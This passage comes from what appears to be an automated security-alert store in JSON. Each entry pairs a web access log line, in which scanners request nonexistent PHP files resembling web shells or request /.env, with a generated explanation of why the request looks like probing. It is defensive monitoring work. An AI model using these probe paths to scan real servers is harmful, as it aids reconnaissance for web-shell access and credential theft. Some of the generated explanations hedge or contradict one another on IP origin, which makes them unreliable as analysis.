mis-typed paths. Not definitive malicious activity but warrants alerts for potential scans.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /hots.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:51:34.540562684Z" }, "5003a57a6dd70112212bb4c20869afb0598aef03aeff0797c2535d910976960c": { "type": "hash", "value": "5003a57a6dd70112212bb4c20869afb0598aef03aeff0797c2535d910976960c", "source": "auto", "reason": "A GET request to /jp.php returning 404 can indicate automated probing for known web shells or vulnerable scripts; not definitive but warrants attention.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /jp.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:55:04.581407867Z" }, "519b8fbf3f6358a2e0861cee0096ec4d23ad38ad03224b790d82147a9b82c5cf": { "type": "hash", "value": "519b8fbf3f6358a2e0861cee0096ec4d23ad38ad03224b790d82147a9b82c5cf", "source": "auto", "reason": "HTTP 404 for an unusual PHP file path from a private IP with an external client IP present in logs suggests automated probing", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /tx78.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:59:10.543548384Z" }, "5258ca7b996a81ff9120309e9febdb3944b225923fa9f914982b3bd54529a530": { "type": "hash", "value": "5258ca7b996a81ff9120309e9febdb3944b225923fa9f914982b3bd54529a530", "source": "auto", "reason": "GET to wp-*.php with 404 suggests probing for WordPress file; external IP present, potential automated scanning.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /wp-p2r3q9c8k4.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:58:42.937700209Z" }, "53ae6ce36ef1947815774cd268e4e1968da7a2c2acf33d4b5bb6cbdcb3751e32": { "type": "hash", "value": "53ae6ce36ef1947815774cd268e4e1968da7a2c2acf33d4b5bb6cbdcb3751e32", "source": "auto", "reason": "404 for wp-access.php could indicate a probing attempt for WordPress admin paths.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /wp-access.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:58:46.488515927Z" }, "54dbdac685e2186e0330515697cf315e74a59d9bacdcf675db04c3064aaec6a7": { "type": "hash", "value": "54dbdac685e2186e0330515697cf315e74a59d9bacdcf675db04c3064aaec6a7", "source": "auto", "reason": "Access to RIP.php with a 404 suggests probing for PHP files; could be an automated scan or misconfigured client.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /RIP.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:46:34.009894452Z" }, "554491384e543aaafadb2b9c7f1de0a53d736b1a73aa4cbbb8366054ce6b1f5c": { "type": "hash", "value": "554491384e543aaafadb2b9c7f1de0a53d736b1a73aa4cbbb8366054ce6b1f5c", "source": "auto", "reason": "HTTP 404 on a likely PHP file (/tfm.php) from an external IP; could indicate probing for vulnerable or misconfigured scripts.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /tfm.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:53:55.161592285Z" }, "5b1d390c367e41a6efc4b59a48d8fa625dd2bf4769dd0eaca66d1535b3dc0c60": { "type": "hash", "value": "5b1d390c367e41a6efc4b59a48d8fa625dd2bf4769dd0eaca66d1535b3dc0c60", "source": "auto", "reason": "Access to a PHP file (potentially probing for vulnerable scripts) returning 404, a common indicator of automated scans.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /5b9ac.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:55:19.999329501Z" }, "6095d79407f0d3e1211aedb069be8f64277afd0b3532e637246be3f2659b6f76": { "type": "hash", "value": "6095d79407f0d3e1211aedb069be8f64277afd0b3532e637246be3f2659b6f76", "source": "auto", "reason": "A GET request to a PHP file returning 404 can indicate probing for resources or misconfigured assets; not definitively malicious but warrants monitoring.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /ws83.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:57:39.555884775Z" }, "6593b8d304bc9fdbabf2fc7e8f96c7c9c1c1ec39a21533d1e8e22f9ccfaabcee": { "type": "hash", "value": "6593b8d304bc9fdbabf2fc7e8f96c7c9c1c1ec39a21533d1e8e22f9ccfaabcee", "source": "auto", "reason": "GET request for /xxw.php returning 404 could indicate probing for vulnerable or hidden PHP file names commonly used by scanners.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /xxw.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:52:17.493869852Z" }, "6760d9465858079017e472cb0657fc6b167f6dd826081e3c2b28dd023e7cabe8": { "type": "hash", "value": "6760d9465858079017e472cb0657fc6b167f6dd826081e3c2b28dd023e7cabe8", "source": "auto", "reason": "Access to gfd.php returning 404 suggests probing for vulnerable PHP file paths. Could be scanner activity.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /gfd.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:58:06.485308486Z" }, "67c771a1769e1da1ff51876c21b89d91ff0465e9319a78c3a0a8731dd94ac01e": { "type": "hash", "value": "67c771a1769e1da1ff51876c21b89d91ff0465e9319a78c3a0a8731dd94ac01e", "source": "auto", "reason": "HTTP GET to /wen.php returning 404; could indicate probing for common or vulnerable scripts", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /wen.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:52:47.109841093Z" }, "6900f3347b58357ab5541063c54894f4a93c0a83fb20acaa603a281ab0787db6": { "type": "hash", "value": "6900f3347b58357ab5541063c54894f4a93c0a83fb20acaa603a281ab0787db6", "source": "auto", "reason": "HTTP 404 response to a request for /nc4.php can indicate probing for vulnerable scripts; not definitive malicious but warrants alert.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /nc4.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:46:47.657825721Z" }, "6ac019b6cc76dc3629806bb98f75d3722b67ee72bfdecd1f5de746e8b009fcb0": { "type": "hash", "value": "6ac019b6cc76dc3629806bb98f75d3722b67ee72bfdecd1f5de746e8b009fcb0", "source": "auto", "reason": "A single 404 GET request for wp-blogs.php suggests probing for WordPress-related resources; could be incidental or malicious scanning.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /wp-blogs.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:46:10.508682562Z" }, "6d14c9e55ee2c795bae912c9bc8d60e6a3d6e4c8f941f9318c64bd245ac68a07": { "type": "hash", "value": "6d14c9e55ee2c795bae912c9bc8d60e6a3d6e4c8f941f9318c64bd245ac68a07", "source": "auto", "reason": "A 404 response for a request to /bo.php commonly indicates a probe for vulnerable scripts or misconfigurations; paired with external IPs in the log, this suggests potential probing activity.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /bo.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:50:34.697969351Z" }, "77a31f1b09cac2c8d588d9be2563ff13ccfa99767da3d680d217c5817d023bdb": { "type": "hash", "value": "77a31f1b09cac2c8d588d9be2563ff13ccfa99767da3d680d217c5817d023bdb", "source": "auto", "reason": "Access to /vx.php with 404 suggests probing for a potentially vulnerable PHP file.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /vx.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:53:23.26369366Z" }, "784a5dd0ed0ec36e43680ceacb719dc5b8211011672983ba49dab0b9225eb8ff": { "type": "hash", "value": "784a5dd0ed0ec36e43680ceacb719dc5b8211011672983ba49dab0b9225eb8ff", "source": "auto", "reason": "HTTP 404 on a PHP file path (55b76.php) can indicate probing or attempted access to potentially vulnerable scripts.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /55b76.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:57:12.3269962Z" }, "7cf682729cc9883d7cdbcda35a948788e4c429a7c7b76f378d3928c2719642ae": { "type": "hash", "value": "7cf682729cc9883d7cdbcda35a948788e4c429a7c7b76f378d3928c2719642ae", "source": "auto", "reason": "Request to wp-act.php path with 404 response, indicative of WP vulnerability reconnaissance or probing.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /wp-act.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:49:12.947630466Z" }, "7d59dde633aeb974eaea0faa1cd8c3f8285069647248eb61cf5753ab71edb87b": { "type": "hash", "value": "7d59dde633aeb974eaea0faa1cd8c3f8285069647248eb61cf5753ab71edb87b", "source": "auto", "reason": "HTTP 404 for a PHP file (nw.php) in a single request could indicate probing or misconfiguration; not a definitive attack but warrant attention.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET //nw.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:54:19.54151251Z" }, "7d628ef84fffb35e854a543d4ea336bd39eeb46c0b0bc967dd933b261f86374c": { "type": "hash", "value": "7d628ef84fffb35e854a543d4ea336bd39eeb46c0b0bc967dd933b261f86374c", "source": "auto", "reason": "HTTP GET to a common probe path (/222.php) returning 404 suggests a potential reconnaissance or probing activity from external IPs", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /222.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:48:49.01773005Z" }, "7e123800afdc7d3c39b46632a8d51c0440d83a1117d769dccedb1891eb1e6c0b": { "type": "hash", "value": "7e123800afdc7d3c39b46632a8d51c0440d83a1117d769dccedb1891eb1e6c0b", "source": "auto", "reason": "HTTP 404 on /asd.php from internal IP may indicate probing or misconfigured route; not definitive attack but worth alerting", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /asd.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:49:34.928570739Z" }, "7e66e92e8ccd4c9209d27e0fa9351ee61efa48e201e27a89e42e46bfcf3b9388": { "type": "hash", "value": "7e66e92e8ccd4c9209d27e0fa9351ee61efa48e201e27a89e42e46bfcf3b9388", "source": "auto", "reason": "404 response for a common PHP file (domains.php) could indicate probing or misconfiguration; not clearly malicious but warrants monitoring.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /domains.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:58:16.72457907Z" }, "80d1e74445b78831507a5a798dbad27d08117745160f52a0331c2874a7ac58df": { "type": "hash", "value": "80d1e74445b78831507a5a798dbad27d08117745160f52a0331c2874a7ac58df", "source": "auto", "reason": "Public-facing GET /b.php returning 404 could indicate probing for known backdoor filenames; not definitely malicious but warrants scrutiny.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /b.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:51:28.947542654Z" }, "840524c8a99f3c6f203c8eae5f7b3493339f404f011f7a49213899e1f96c5a55": { "type": "hash", "value": "840524c8a99f3c6f203c8eae5f7b3493339f404f011f7a49213899e1f96c5a55", "source": "auto", "reason": "HTTP 404 for a PHP file path from an external client can indicate probing or automated vulnerability scans.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /a5e0a.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:57:58.208937244Z" }, "849d055c68e4d482fab03b666791c834c98f29730766176d773d0bc0c1840b3d": { "type": "hash", "value": "849d055c68e4d482fab03b666791c834c98f29730766176d773d0bc0c1840b3d", "source": "auto", "reason": "HTTP GET targeting a specific PHP file under public, resulting in 404. Could indicate probing for vulnerable paths or misconfigured public endpoints.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /public/vx.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:50:48.714904642Z" }, "8ec43eaa2858b3243829cc51b19555ac963ff5154216db187dfe229945af7121": { "type": "hash", "value": "8ec43eaa2858b3243829cc51b19555ac963ff5154216db187dfe229945af7121", "source": "auto", "reason": "Request attempts to access a sensitive environment file (.env) from a client; typical probing activity.", "original_line": "\u003cNUM\u003e/03/19 23:59:20 [error] 10#10: *\u003cNUM\u003e access forbidden by rule, client: \u003cIP\u003e, server: _, request: \"GET /.env HTTP/1.0\", host: \"api.admin.kovicloud.com\"", "created_at": "2026-03-20T00:00:53.468464584Z" }, "8f14eae0cfe156a568d2e3fe6e48041cfa428baa221634183090d4dd16e562c3": { "type": "hash", "value": "8f14eae0cfe156a568d2e3fe6e48041cfa428baa221634183090d4dd16e562c3", "source": "auto", "reason": "Access to /ms.php returning 404 could indicate probing for PHP scripts or hidden endpoints; not definitive malicious activity but warrants monitoring.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /ms.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:49:44.915414581Z" }, "948c2786f4d9c14e356dcdde21c26866ada332959e31c565523436af3bf9e9a3": { "type": "hash", "value": "948c2786f4d9c14e356dcdde21c26866ada332959e31c565523436af3bf9e9a3", "source": "auto", "reason": "The log shows a 404 for a request to a suspicious PHP file (rzki.php) from a client IP, which can indicate probing or potential vulnerability scanning.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /rzki.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:55:35.806257095Z" }, "95658e43bacbf097a29727590fec6a14fa14b7e2867a674e1360d0c5a44c36a5": { "type": "hash", "value": "95658e43bacbf097a29727590fec6a14fa14b7e2867a674e1360d0c5a44c36a5", "source": "auto", "reason": "A GET request for a random PHP file returning 404 from a client IP suggests a potential probe or scan activity.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /6kDPjgFTmvS.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:59:05.707025172Z" }, "9620b67837750fbe27beebe1d84bc5d417d3849781b169d6fa83623b8da6f5df": { "type": "hash", "value": "9620b67837750fbe27beebe1d84bc5d417d3849781b169d6fa83623b8da6f5df", "source": "auto", "reason": "HTTP 404 for /tt.php with external IP in request pattern may indicate probing for vulnerable PHP file.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /tt.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:53:03.794844957Z" }, "975677e40053b27ffbe6025e01dbaea61beb54f87e4ca754cc28847c5ee93f4b": { "type": "hash", "value": "975677e40053b27ffbe6025e01dbaea61beb54f87e4ca754cc28847c5ee93f4b", "source": "auto", "reason": "HTTP 404 for a php endpoint (ws49.php) from an internal IP; could be probing or misconfigured route; not definitive malicious but warrants attention.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /ws49.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:59:20.244779042Z" }, "9792f603800d3ea6a193d80f34a73235b8af93216cdf3c58e10fe4c73a17795e": { "type": "hash", "value": "9792f603800d3ea6a193d80f34a73235b8af93216cdf3c58e10fe4c73a17795e", "source": "auto", "reason": "Access to /maul.php returning 404 suggests probing for PHP files; pattern is common in web vulnerability scans. Not confirmed malicious, but warrants alert.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /maul.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:59:57.882706888Z" }, "99c9774b9fd72039ff69db089db2b511b0c57c757c0996a6f59f576cbcccf323": { "type": "hash", "value": "99c9774b9fd72039ff69db089db2b511b0c57c757c0996a6f59f576cbcccf323", "source": "auto", "reason": "HTTP 404 for a php file (ws86.php) can indicate probing for vulnerable scripts or misconfigured endpoints. While not definitive, it warrants attention.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /ws86.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:47:32.011406751Z" }, "9f118b0e1d87a17ebc2452336505816913b6552f46d2951f76cdb7554a6c2ca1": { "type": "hash", "value": "9f118b0e1d87a17ebc2452336505816913b6552f46d2951f76cdb7554a6c2ca1", "source": "auto", "reason": "HTTP GET to /amp.php returning 404; could indicate probing for AMP pages or misconfigured route. Not malicious by itself, but warrants attention.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /amp.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:51:07.285547548Z" }, "a452d024a40e157c705e6abbc463ce04eac06e0f21a16765b52886589cedcbd4": { "type": "hash", "value": "a452d024a40e157c705e6abbc463ce04eac06e0f21a16765b52886589cedcbd4", "source": "auto", "reason": "Access to ws78.php with a 404 Not Found could indicate probing for web shells or vulnerable scripts; not definitive abuse but warrants attention.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /ws78.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:47:04.526520884Z" }, "a59e56d0029d946fc5f150beb491f99a82ac442f85d7068744a98c91b5769c05": { "type": "hash", "value": "a59e56d0029d946fc5f150beb491f99a82ac442f85d7068744a98c91b5769c05", "source": "auto", "reason": "404 on a request to /ws77.php can indicate probing for vulnerable PHP files or misconfigured routes; not definitive malicious activity but warrants attention.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /ws77.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:48:12.746179264Z" }, "a68ada8785521c174a6a6d76ead2961a3c0b4287ecc65305e2dff9fbfa10e794": { "type": "hash", "value": "a68ada8785521c174a6a6d76ead2961a3c0b4287ecc65305e2dff9fbfa10e794", "source": "auto", "reason": "HTTP 404 for /a4.php with external IP in a rapid, simple request pattern can indicate probing for vulnerable or misconfigured PHP files.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /a4.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:51:13.049804555Z" }, "a77bb58d6c7cd2e2bfce98b5e6e055ae5533e982bb6a258d8183f6546d2865ef": { "type": "hash", "value": "a77bb58d6c7cd2e2bfce98b5e6e055ae5533e982bb6a258d8183f6546d2865ef", "source": "auto", "reason": "HTTP GET to gifclass.php returning 404 from external IP suggests a probe or scan for a known file (gifclass.php). Not definitive malicious but warrants alerting.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /gifclass.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:48:23.217963809Z" }, "a785e240e5376c85ad5d06c9857306d2eb439050c78ffab1f21f9768d402a605": { "type": "hash", "value": "a785e240e5376c85ad5d06c9857306d2eb439050c78ffab1f21f9768d402a605", "source": "auto", "reason": "HTTP 404 for /vanda.php could indicate automated probing for a known vulnerable script.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /vanda.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:50:55.814453799Z" }, "a9873dd700aa83d56dcf1fbf9c0f658bbcbb350cb7b6ef68ea5cbcf4c21dc47c": { "type": "hash", "value": "a9873dd700aa83d56dcf1fbf9c0f658bbcbb350cb7b6ef68ea5cbcf4c21dc47c", "source": "auto", "reason": "HTTP GET to /8.php (a common probe for php info or vulnerability scanning) returning 404; could indicate reconnaissance activity.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /8.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:48:29.820777697Z" }, "ad584c5c4b0d9099834e54bb575e794b14041cee2c15c865d6b4cb85daeb919a": { "type": "hash", "value": "ad584c5c4b0d9099834e54bb575e794b14041cee2c15c865d6b4cb85daeb919a", "source": "auto", "reason": "HTTP 404 for a wp5.php request from a web server can indicate probing for WordPress-related files.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /wp5.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:52:52.71141361Z" }, "af269a77d20f7278275e3c25b6b07f263bd7f906b293f36166b04527aded7e12": { "type": "hash", "value": "af269a77d20f7278275e3c25b6b07f263bd7f906b293f36166b04527aded7e12", "source": "auto", "reason": "HTTP 404 on a PHP file named w3lls.php could indicate probing for vulnerable scripts or misconfiguration attempts; unusual filename in GET request stands out as potential scan.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /w3lls.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:47:26.200870896Z" }, "b84a93064f43bdbe3348a7cdb45683372ba72d83b62ca804d17c2b8cf231dc31": { "type": "hash", "value": "b84a93064f43bdbe3348a7cdb45683372ba72d83b62ca804d17c2b8cf231dc31", "source": "auto", "reason": "GET request for /varb.php returning 404 from a web server; unusual filename may indicate probing for common PHP scripts.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /varb.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:52:58.038421407Z" }, "bdf5c58e229c88151bf1e52b43374d5a71df560489bd96242d2d8d664b1dca71": { "type": "hash", "value": "bdf5c58e229c88151bf1e52b43374d5a71df560489bd96242d2d8d664b1dca71", "source": "auto", "reason": "A single request for a PHP file (/xff.php) resulting in 404 may indicate probing for sensitive files; not definitive malicious activity but warrants monitoring.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /xff.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:47:50.344130974Z" }, "befd63555d5c542fa77db8bd8fcbf78b9dcd83c0f25f8c290d34bfc8da9d1a61": { "type": "hash", "value": "befd63555d5c542fa77db8bd8fcbf78b9dcd83c0f25f8c290d34bfc8da9d1a61", "source": "auto", "reason": "Access log shows a request for wp-the.php returning 404, which is an unusual filename and could indicate probing for WordPress-related files.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /wp-the.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:51:39.622572722Z" }, "c0b67a7dde93d39b00a4d6ab63fe4f8a39db0f45d3ae1b3923c3a6c2dd32f314": { "type": "hash", "value": "c0b67a7dde93d39b00a4d6ab63fe4f8a39db0f45d3ae1b3923c3a6c2dd32f314", "source": "auto", "reason": "HTTP 404 for tool.php suggests possible probing or scanning activity; not definitive malicious but warrants investigation.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /tool.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:49:02.083870803Z" }, "c1386ca4c2752904dde7dae4440c4cb77fd17b05ba3e46e2621d7462d22ee71a": { "type": "hash", "value": "c1386ca4c2752904dde7dae4440c4cb77fd17b05ba3e46e2621d7462d22ee71a", "source": "auto", "reason": "HTTP 404 for a potentially probing path (byypas.php) from an external IP; unusual access pattern but not definitive malicious activity yet.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /byypas.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:58:21.487179321Z" }, "c2407f81724121e4932f9d0d26ce786e156b7cfcb2bdd0782374b3db65262ec7": { "type": "hash", "value": "c2407f81724121e4932f9d0d26ce786e156b7cfcb2bdd0782374b3db65262ec7", "source": "auto", "reason": "Access to a non-existent wp9.php page with 404 status may indicate probing for vulnerable PHP files.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /wp9.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:52:41.338039087Z" }, "c2e476bbb0a40eae01bee08e1a4fe69a7719b4a5205acd5ee7b03967eb9087ed": { "type": "hash", "value": "c2e476bbb0a40eae01bee08e1a4fe69a7719b4a5205acd5ee7b03967eb9087ed", "source": "auto", "reason": "Access to wp-blog.php with 404 status is a common probe for WordPress disclosures; involves external IPs and a precise timestamp, indicating potential automated scanning.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /public/wp-blog.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T13:00:02.978833022Z" }, "c38ea282ad084f57bf5211a80209907592509706078cbbf6cd9000cedbef5a1e": { "type": "hash", "value": "c38ea282ad084f57bf5211a80209907592509706078cbbf6cd9000cedbef5a1e", "source": "auto", "reason": "Access to /1.php 404 from internal IPs suggests probing or misconfiguration; not clearly malicious but warrants monitoring", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /1.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:51:19.844716731Z" }, "c664b9021d7ee613fc5018f02a56f18b34290828145358a582fc3504d820dd13": { "type": "hash", "value": "c664b9021d7ee613fc5018f02a56f18b34290828145358a582fc3504d820dd13", "source": "auto", "reason": "Access to /166.php returning 404 suggests probing for PHP file presence; combined with cross-origin IP in log may indicate automated scanning.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /166.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T13:00:33.647058771Z" }, "cdcba1237a4d93667ab6e2ed9bcedcee8a9192c0c8e290390047e09e6df1544c": { "type": "hash", "value": "cdcba1237a4d93667ab6e2ed9bcedcee8a9192c0c8e290390047e09e6df1544c", "source": "auto", "reason": "A GET request for a common sensitive path (edit.php) returning 404 suggests probing or targeted scanning activity rather than normal user traffic.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /edit.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:55:44.673346574Z" }, "ce5c32e93ed10d2ec4b465e3722d6ef923faa1a9272851f3fad2e8a1caa18684": { "type": "hash", "value": "ce5c32e93ed10d2ec4b465e3722d6ef923faa1a9272851f3fad2e8a1caa18684", "source": "auto", "reason": "HTTP 404 for an AJAX PHP endpoint (/ajax.php) from an external IP in logs can indicate probing for common web vulnerabilities.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /ajax.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:59:51.964818875Z" }, "cf0ba23058d552f7a658a6d8c7d1e2e2cc14eb6e5d289967e41a97343a5e0835": { "type": "hash", "value": "cf0ba23058d552f7a658a6d8c7d1e2e2cc14eb6e5d289967e41a97343a5e0835", "source": "auto", "reason": "HTTP 404 for a likely unusual path (/inege.php) can indicate probing for mis-typed or sensitive files.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /inege.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:58:53.899744847Z" }, "d00a32c22dec9d2b95bc375cccb159be3d08fdb9377ad6cadfe0d5b5fe0c3459": { "type": "hash", "value": "d00a32c22dec9d2b95bc375cccb159be3d08fdb9377ad6cadfe0d5b5fe0c3459", "source": "auto", "reason": "Detected an HTTP GET request for install.php returning 404, which is commonly used in vulnerability and install probing attempts against web servers.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /install.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:58:26.812234219Z" }, "d0a07a959df32b2b406a2760eebe6b1f5087461bb7e221f16d2f0bb6c21d8a71": { "type": "hash", "value": "d0a07a959df32b2b406a2760eebe6b1f5087461bb7e221f16d2f0bb6c21d8a71", "source": "auto", "reason": "Request for /shell.php with 404 and curl user-agent indicates probing for webshells.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /shell.php HTTP/1.0\" 404 146 \"-\" \"curl/8.5.0\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T00:01:09.043806935Z" }, "d1c0846b2604d4772a502c4aa62912cec8798975a68f4fa3d730a0c8bd3d8e1b": { "type": "hash", "value": "d1c0846b2604d4772a502c4aa62912cec8798975a68f4fa3d730a0c8bd3d8e1b", "source": "auto", "reason": "HTTP 404 on a WordPress admin CSS path from a container service suggests probing for admin endpoints; not definitive malicious activity but merits alerts.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /wp-admin/css/bolt.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:54:12.825849933Z" }, "d2f8b0856eee18c194dd08344b684b21ebb0409a40d099aa5553cd673dcf736a": { "type": "hash", "value": 